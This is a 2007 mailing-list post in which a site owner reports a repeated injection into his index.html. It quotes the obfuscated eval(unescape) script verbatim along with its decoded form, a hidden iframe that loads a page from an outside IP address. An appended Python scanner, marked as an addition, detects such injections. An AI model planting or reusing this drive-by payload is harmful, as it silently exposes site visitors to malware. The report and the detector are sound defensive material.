[ale] I've been hacked!
Jim Lynch
ale_nospam at fayettedigital.com
Wed Nov 21 06:57:14 EST 2007
Last summer I received notification from Google that a web page on one
of my web hosting accounts was infected with some sort of malware bug.
This account only has FTP access, so I changed the password for the one
and only FTP account and removed the offending code from my index.html
file. I also added a cron job on another site to compare a good
index.html with the one on the site that had been hacked, in case they
came back.
They did.
Today I received a message that said the compare failed and found the
following at the top of the body in my index.html file:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
</script>
That script, unescaped, looks like:
window.status='Done';document.write('<iframe name=7b73
src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\'
width=351 height=133 style=\'display: none\'></iframe>')
Has anyone seen anything like this before? I wonder what sort of evil
function it might perform?
I also wonder how they got access the second time. I went through the
CGI scripts on that system to be sure they were mine. There aren't any
PHP files on the system.
I attempted to look up the IP address, but nslookup said it didn't exist;
however, it pings, and the index.html file from it is the default Apache2
index file. I suspect that system has been hacked as well.
Note that the incident from last summer was a different one.
Thanks,
Jim.
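The injected block above is the classic eval(unescape("%XX...")) wrapper around a hidden iframe. The following is an added example, not code from the original post: a small Python scanner that reproduces what JavaScript's unescape() does, decodes any such blocks found in a page, and reports hidden iframes and the hosts they point at, which is the check a cron job like the one described could run against the live index.html. The sample HTML and the host 198.51.100.7 are constructed for the example.

```python
"""Decode eval(unescape("...")) blocks in HTML and flag hidden iframe injections."""
import re
from urllib.parse import urlparse

# eval(unescape("<percent-encoded payload>")) -- the wrapper seen in the injected page
EVAL_UNESCAPE = re.compile(r'eval\(\s*unescape\(\s*["\']([^"\']+)["\']\s*\)\s*\)', re.I)
# An iframe whose inline style hides it (style='display: none')
HIDDEN_IFRAME = re.compile(r'<iframe[^>]*display:\s*none[^>]*>', re.I)
# src value, tolerating the backslash-escaped quotes used inside document.write('...')
IFRAME_SRC = re.compile(r"""src=\\?['"]?([^'"\\\s>]+)""", re.I)


def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX -> UTF-16 code unit, %XX -> Latin-1 byte."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})', repl, s)


def find_injections(html):
    """Return one finding per eval(unescape(...)) block: decoded text, hidden iframe count, hosts."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(html):
        decoded = js_unescape(m.group(1))
        iframes = HIDDEN_IFRAME.findall(decoded)
        hosts = []
        for tag in iframes:
            src = IFRAME_SRC.search(tag)
            if src:
                hosts.append(urlparse(src.group(1)).hostname)
        findings.append({"decoded": decoded, "hidden_iframes": len(iframes), "hosts": hosts})
    return findings


# Constructed sample: the same shape as the injected script, with a placeholder host.
PAYLOAD = ("window.status='Done';document.write('<iframe name=7b73 "
           "src=\\'http://198.51.100.7/~user/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\\' "
           "width=351 height=133 style=\\'display: none\\'></iframe>')")
SAMPLE_HTML = ('<html><body>\n<script>eval(unescape("'
               + "".join(f"%{ord(c):02x}" for c in PAYLOAD)
               + '"));\n</script>\n<p>Welcome</p></body></html>')

if __name__ == "__main__":
    for f in find_injections(SAMPLE_HTML):
        print(f"hidden iframes: {f['hidden_iframes']}, hosts: {f['hosts']}")
        print(f["decoded"])
```

A non-zero finding count (or a non-empty host list) is the condition worth alerting on; the decoded text can be logged alongside the diff so the next comparison failure explains itself.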